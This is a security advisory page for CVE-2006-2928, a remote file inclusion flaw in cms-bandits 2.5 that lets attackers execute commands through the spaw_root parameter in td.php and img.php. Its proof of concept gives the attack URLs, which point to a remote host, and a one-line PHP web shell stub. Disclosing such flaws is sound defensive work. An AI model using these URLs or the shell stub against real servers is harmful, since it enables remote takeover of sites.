cms-bandits 2.5 - Remote command execution

2006.06.10
Credit: Federico Fazzi (federico autistici org)
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-2928
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

----------------------------------------------------- Advisory id: FSA:006 Author: Federico Fazzi Date: 08/06/2006, 11:09 Sinthesis: cms-bandits 2.5, Remote command execution Type: high Product: http://sourceforge.net/projects/cms-bandits Patch: unavailable ----------------------------------------------------- 1) Description: Error occured in td.php, include $spaw_root.'class/util.class.php'; include $spaw_root.'class/lang.class.php'; Error occured in img.php, include $spaw_root.'class/util.class.php'; include $spaw_root.'class/lang.class.php'; required register_global = On, The users can include a remote file because the $spaw_root is undeclare. 2) Proof of concept: http://127.0.0.1/cms/dialogs/td.php?spaw_root=[cmd_with_final_slash] http://127.0.0.1/cms/dialogs/img.php?spaw_root=[cmd_with_final_slash] [cmd_with_final_slash] = http://example/cmd.php/ cmd.php = <?php system("commands here"); or passthru ?> 3) Solution: sanitized the variable on img.php, td.php.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top